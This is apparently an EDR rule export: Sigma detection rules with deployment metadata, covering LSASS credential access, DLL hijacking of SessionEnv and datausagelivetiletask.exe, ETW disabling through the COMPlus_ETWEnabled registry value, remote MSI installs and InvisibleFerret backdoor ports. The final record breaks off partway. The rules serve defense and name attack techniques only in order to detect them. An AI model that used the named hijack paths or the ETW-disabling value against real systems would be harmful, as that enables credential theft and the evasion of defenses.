"content": "title: LSASS Accessed with Suspicious CallTrace Starting with Uncommon DLL\nid: 8120633c-3a12-4a4a-ba28-aca664ee60b2\ndescription: |\n Detects an access to LSASS whose call trace starts with an uncommon pattern.\n Adversaries may try to obfuscate their accesses to the LSASS process by using direct syscalls or custom DLLs.\n It is recommended to investigate the process accessing LSASS and the content of the call trace.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n CallTrace|contains: 'dll' # filter out empty calltrace\n\n filter_start_ntdll:\n CallTrace|startswith: '?:\\Windows\\System32\\ntdll.dll'\n\n # This is handled by the rule 4c2e7819-9e13-4d0f-8926-6bab029881d7\n filter_unknown:\n CallTrace:\n - 'UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n\n filter_error:\n CallTrace|startswith: 'ACCESS_FAILED'\n\n filter_winsxs:\n CallTrace|startswith:\n - '?:\\Windows\\WinSxS\\amd64_microsoft-windows-ntdll_'\n - '?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\$$DeleteMe.ntdll.dll'\n - '?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\$$DeleteMentdll.dll'\n\n exclusion_start_symantec:\n CallTrace|startswith:\n - '?:\\Windows\\System32\\sysfer.dll'\n - '?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Sysfer\\x64\\sysfer.dll'\n\n exclusion_start_wowcpu:\n CallTrace|startswith: '?:\\Windows\\System32\\wow64cpu.dll'\n\n exclusion_bmc:\n ProcessImage: '*\\BMC Software\\Client 
Management\\\\*\\bin\\mtxagent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BMC Software France SAS'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_eset:\n ProcessImage: '*\\ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfetp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe' # C:\\Program Files\\McAfee\\Endpoint Security\\Firewall\\mfefw.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_sentinelone:\n ProcessImage: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sentinel Labs, Inc.'\n\n exclusion_afkjourney:\n ProcessImage|endswith: '\\AFKJourney Game\\game\\AFK Journey.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Shanghai Lilith Network Technology Co., Ltd.'\n\n exclusion_kaspersky:\n SourceImage:\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe'\n - '?:\\Program Files (x86)\\Kaspersky Lab\\KES.*\\avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_anticheat:\n SourceImage: '?:\\Program Files\\EA\\AC\\eaanticheat.gameservice.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Electronic Arts, Inc.'\n\n exclusion_defender:\n SourceImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_hp:\n SourceImage:\n - 
'?:\\WINDOWS\\System32\\DriverStore\\FileRepository\\\\*\\x64\\AppHelperCap.exe'\n - '?:\\Program Files\\HP\\HP Enabling Services\\AppHelperCap.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'HP Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8120633c-3a12-4a4a-ba28-aca664ee60b2",
"rule_name": "LSASS Accessed with Suspicious CallTrace Starting with Uncommon DLL",
"rule_description": "Detects an access to LSASS whose call trace starts with an uncommon pattern.\nAdversaries may try to obfuscate their accesses to the LSASS process by using direct syscalls or custom DLLs.\nIt is recommended to investigate the process accessing LSASS and the content of the call trace.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81219c6e-886d-4b50-b40f-41239e06d340",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073948Z",
"creation_date": "2026-03-23T11:45:34.073950Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073960Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_prepare_persistence_dll_hijack_sessionenv_tsmsisrv_tsvipsrv.yml",
"content": "title: SessionEnv Service DLL Hijack Prepared\nid: 81219c6e-886d-4b50-b40f-41239e06d340\ndescription: |\n Detects the preparation of a DLL hijacking of the SessionEnv service, which tries to load the non-existent TSMSISrv.dll or TSVIPSrv.dll DLLs in the System32 directory.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL in paths where the application is lured into loading the malicious DLL.\n Attackers can use this technique to execute malicious code within a legitimate process and try to bypass security restrictions.\n It is recommended to analyze the process responsible for the creation of the DLL file as well as to analyze the DLL itself to look for malicious content or actions.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/10/02\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Windows\\System32\\TSMSISrv.dll'\n - '?:\\Windows\\System32\\TSVIPSrv.dll'\n\n exclusion_tiworker:\n # C:\\Windows\\WinSxS\\Temp\\InFlight\\8e744265c6e9d6012163000028443044\\x86_microsoft-windows-t..-tsappsrv-component_31bf3856ad364e35_10.0.18362.1_none_e51344e8b75a8450\\TSVIPSrv.dll\n # C:\\Windows\\SoftwareDistribution\\Download\\5e1bc13863a9edce2a85b3decedd49f5\\wow64 Microsoft-...\\TSVIPSrv.dll\n Path|startswith:\n - '?:\\Windows\\WinSxS\\Temp\\'\n - '?:\\Windows\\SoftwareDistribution\\'\n\n exclusion_setuphost:\n 
#\"C:\\$WINDOWS.~BT\\Sources\\SetupHost.Exe\" /Install /Package /Quiet /ReportId 392BCADE-AA59-480A-BCB8-2531CF4C7BB7.1 /FlightData \"RS:91AA\" \"/CancelId\" \"C-550fea5d-7c6c-4f82-aafd-2ff0174557d1\" \"/PauseId\" \"P-550fea5d-7c6c-4f82-aafd-2ff0174557d1\" \"/CorrelationVector\" \"GSAhuSONx02Lv7o+.10.0.0.3.147\" \"/EnterpriseAttribution\" \"/ActionListFile\" \"C:\\Windows\\SoftwareDistribution\\Download\\1e1311ab437e7a164204683b9686c982\\ActionList.xml\"\n Path|startswith:\n # C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\x86 microsoft-windows-t..-tsappsrv-component 31bf3856ad364e35 10.0.19041.1 none c8a6e270d97f9beb\\TSVIPSrv.dll\n - '?:\\Windows\\WinSxS\\'\n # c:\\windows\\servicing\\LCU\\*\\tsmisrv.dll\n - '?:\\Windows\\servicing\\LCU\\'\n\n exclusion_mui:\n # some alerts are raised on *.mui files?\n Path|endswith:\n - '\\TSMSISrv.dll.mui'\n - '\\TSVIPSrv.dll.mui'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81219c6e-886d-4b50-b40f-41239e06d340",
"rule_name": "SessionEnv Service DLL Hijack Prepared",
"rule_description": "Detects the preparation of a DLL hijacking of the SessionEnv service, which tries to load the non-existent TSMSISrv.dll or TSVIPSrv.dll DLLs in the System32 directory.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL in paths where the application is lured into loading the malicious DLL.\nAttackers can use this technique to execute malicious code within a legitimate process and try to bypass security restrictions.\nIt is recommended to analyze the process responsible for the creation of the DLL file as well as to analyze the DLL itself to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "814f4f55-9d99-469a-bbd5-80b622a72327",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087839Z",
"creation_date": "2026-03-23T11:45:34.087841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087846Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/",
"https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_etw_disabled_env.yml",
"content": "title: ETWEnabled User Environment Variable Modified via Registry\nid: 814f4f55-9d99-469a-bbd5-80b622a72327\ndescription: |\n Detects a modification of the environment variable in registry \"COMPlus_ETWEnabled\" to a non-empty value, effectively disabling ETW for the current user.\n Event Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\n Attackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\n It is recommended to ensure that this action is legitimate and performed by an authorized administrator.\nreferences:\n - https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/\n - https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/03/20\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: SetValue\n TargetObject|endswith: '\\Environment\\COMPlus_ETWEnabled'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n selection_rename:\n EventType: RenameValue\n TargetObject|endswith: '\\Environment\\COMPlus_ETWEnabled'\n\n condition: (selection_set and not filter_empty) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "814f4f55-9d99-469a-bbd5-80b622a72327",
"rule_name": "ETWEnabled User Environment Variable Modified via Registry",
"rule_description": "Detects a modification of the environment variable in registry \"COMPlus_ETWEnabled\" to a non-empty value, effectively disabling ETW for the current user.\nEvent Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\nAttackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\nIt is recommended to ensure that this action is legitimate and performed by an authorized administrator.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81652c3b-9fe2-4574-8a7c-b934c200d75f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602648Z",
"creation_date": "2026-03-23T11:45:34.602652Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602660Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_datausagelivetiletask.yml",
"content": "title: DLL Hijacking via datausagelivetiletask.exe\nid: 81652c3b-9fe2-4574-8a7c-b934c200d75f\ndescription: |\n Detects potential Windows DLL Hijacking via datausagelivetiletask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'datausagelivetiletask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dusmapi.dll'\n - '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81652c3b-9fe2-4574-8a7c-b934c200d75f",
"rule_name": "DLL Hijacking via datausagelivetiletask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via datausagelivetiletask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81687d0a-fbde-46b9-806e-4ec222dbcb81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618575Z",
"creation_date": "2026-03-23T11:45:34.618577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_tar_archive_creation_file.yml",
"content": "title: Archive Created via tar in a Suspicious Folder\nid: 81687d0a-fbde-46b9-806e-4ec222dbcb81\ndescription: |\n Detects archive creation using tar in a folder commonly used by malicious code.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to tar's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/07/22\nmodified: 2024/03/12\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/tar'\n ProcessCommandLine|contains: ' -c'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81687d0a-fbde-46b9-806e-4ec222dbcb81",
"rule_name": "Archive Created via tar in a Suspicious Folder",
"rule_description": "Detects archive creation using tar in a folder commonly used by malicious code.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to tar's execution and the content of the archive.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2024-03-12",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81d540bc-ce2c-43e7-8b95-5d78f41f00cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089558Z",
"creation_date": "2026-03-23T11:45:34.089560Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089565Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/007/"
],
"name": "t1218_007_msiexec_remote_installation.yml",
"content": "title: MSI File Installed Remotely\nid: 81d540bc-ce2c-43e7-8b95-5d78f41f00cf\ndescription: |\n Detects the installation of a remote MSI file.\n Adversaries may install a remote MSI in order to deploy malicious code on a compromised host.\n It is recommended to check if msiexec has spawned any suspicious child process and determine the legitimacy of the contacted URL.\nreferences:\n - https://attack.mitre.org/techniques/T1218/007/\ndate: 2025/05/20\nmodified: 2025/11/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.007\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessImage|endswith: '\\msiexec.exe'\n ProcessParentImage|endswith: '\\services.exe'\n UserAgent:\n - 'Windows Installer'\n - 'AdvancedInstaller'\n RequestUrlHost|contains: '.' # host without dot is probably on local network\n\n exclusion_sccm:\n RequestUrl|contains:\n - '/sms_dp_smspkg$/'\n - '/nocert_sms_dp_smspkg$/'\n - '/ccmtokenauth_sms_dp_smspkg$/'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81d540bc-ce2c-43e7-8b95-5d78f41f00cf",
"rule_name": "MSI File Installed Remotely",
"rule_description": "Detects the installation of a remote MSI file.\nAdversaries may install a remote MSI in order to deploy malicious code on a compromised host.\nIt is recommended to check if msiexec has spawned any suspicious child process and determine the legitimacy of the contacted URL.\n",
"rule_creation_date": "2025-05-20",
"rule_modified_date": "2025-11-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81ee28b1-c1cb-437e-b0b2-465d0a0ed9f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075156Z",
"creation_date": "2026-03-23T11:45:34.075159Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075163Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/",
"https://objective-see.org/blog/blog_0x7A.html",
"https://www.group-ib.com/blog/apt-lazarus-python-scripts/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_invisibleferret_backdoor_windows.yml",
"content": "title: InvisibleFerret Backdoor Communication Detected (Windows)\nid: 81ee28b1-c1cb-437e-b0b2-465d0a0ed9f8\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.ThreatActor.APT38\n - classification.Windows.ThreatActor.Lazarus\n - classification.Windows.Malware.InvisibleFerret\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessImage: '?:\\Users\\\\*\\.pyp\\python.exe'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81ee28b1-c1cb-437e-b0b2-465d0a0ed9f8",
"rule_name": "InvisibleFerret Backdoor Communication Detected (Windows)",
"rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-10-25",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.credential_access",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1056.001",
"attack.t1555.003",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81ff4aaf-a9b8-4e55-8636-5ebde7e57ac6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071895Z",
"creation_date": "2026-03-23T11:45:34.071897Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_persistence_type_lib.yml",
